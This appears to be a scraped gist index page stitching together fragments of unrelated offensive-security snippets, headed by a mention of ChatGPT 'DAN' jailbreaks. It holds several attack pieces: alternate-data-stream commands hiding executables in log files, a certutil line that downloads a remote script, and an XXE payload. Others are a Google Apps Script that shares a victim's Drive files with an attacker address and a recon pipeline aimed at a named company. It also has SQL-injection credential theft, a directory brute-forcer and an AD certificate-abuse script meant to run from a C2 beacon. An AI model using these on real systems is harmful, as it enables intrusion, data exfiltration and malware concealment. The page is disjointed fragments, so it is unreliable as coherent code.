srand2

Chat GPT "DAN" (and other "Jailbreaks")

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

Using Blind SQL Injections to Retrieve Access Credentials of a Website

In this gist I show how I leveraged a boolean-blind sql injection to gain access to a protected website. The injection allowed me query the website database and retrieve a valid pair username/password. Using the retrieved credentials I was able to login into the protected section of the website.

Software Used

To perform the attack I used:

sqlmap to discover the website was vulnerable to SQL injections.
Burp Suite to forge and send POST requests to the website login page, carrying payloads opportunely crafted with SQL queries.

	#!/bin/env python3

	import argparse
	import datetime
	import re
	import sys
	import uuid

	###############################################################################
	# Based off of Daniel Thatcher's guid tool

	#pip install ecdsa
	#
	import base64
	import hashlib
	from hashlib import sha256
	import hmac

	from ecdsa.ecdsa import Signature, generator_256

	from ecdsa import VerifyingKey, NIST256p

	<!DOCTYPE doc [
	<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
	<!ENTITY % SuperClass '>
	<!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices">
	<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>">
	%eval;
	%error;
	<!ENTITY test "test"'
	>
	%local_dtd;

	import asyncio
	import aiohttp
	import time
	import sys
	import argparse
	import os

	parser = argparse.ArgumentParser(description='Directory Bruteforce')
	parser.add_argument('-u', '--url', help='URL to bruteforce', required=True)
	parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True)

	function driveSearch() {
	// Setup the exfil folder
	var user = Session.getActiveUser().getEmail();
	var folder = DriveApp.createFolder(user);
	var attackerEmail = "[email protected]";
	folder.addViewer(attackerEmail);

	// Search Drive
	var files = DriveApp.searchFiles('hidden = false');
	// Iterate through files in Drive

	curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json \|jq -r '.vulnerabilities[].cveID' > cves.txt

	subfinder -d tesla.com -silent \|dnsx -silent -a -resp-only \|sort -u \|xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% \|grep "CIDR" \|cut -d : -f2 \|tr , "\n"\| awk '{$1=$1};1' \|sort -u \|egrep -v "/8\|/9\|/10\|/11\|/12\|/13\|/14\|/15\|/16" \|while read ip ;do whois -h whois.cymru.com " -v $ip" ;done \|grep -v "BGP Prefix" \|cut -d '\|' -f3 \|awk '{$1=$1};1' \|sort -u \|cidr2ip \|sort -u \|nrich - \|grep -B4 -f cves.txt \| tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt

	#Thank you @NotMedic for troubleshooting/validating stuff!

	$password = Read-Host -Prompt "Enter Password"
	#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

	$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
	$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
	$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
	$CASERVER = "alexlab-dc01-ca" #CA name.
	$CA = $CAFQDN + "\" + $CASERVER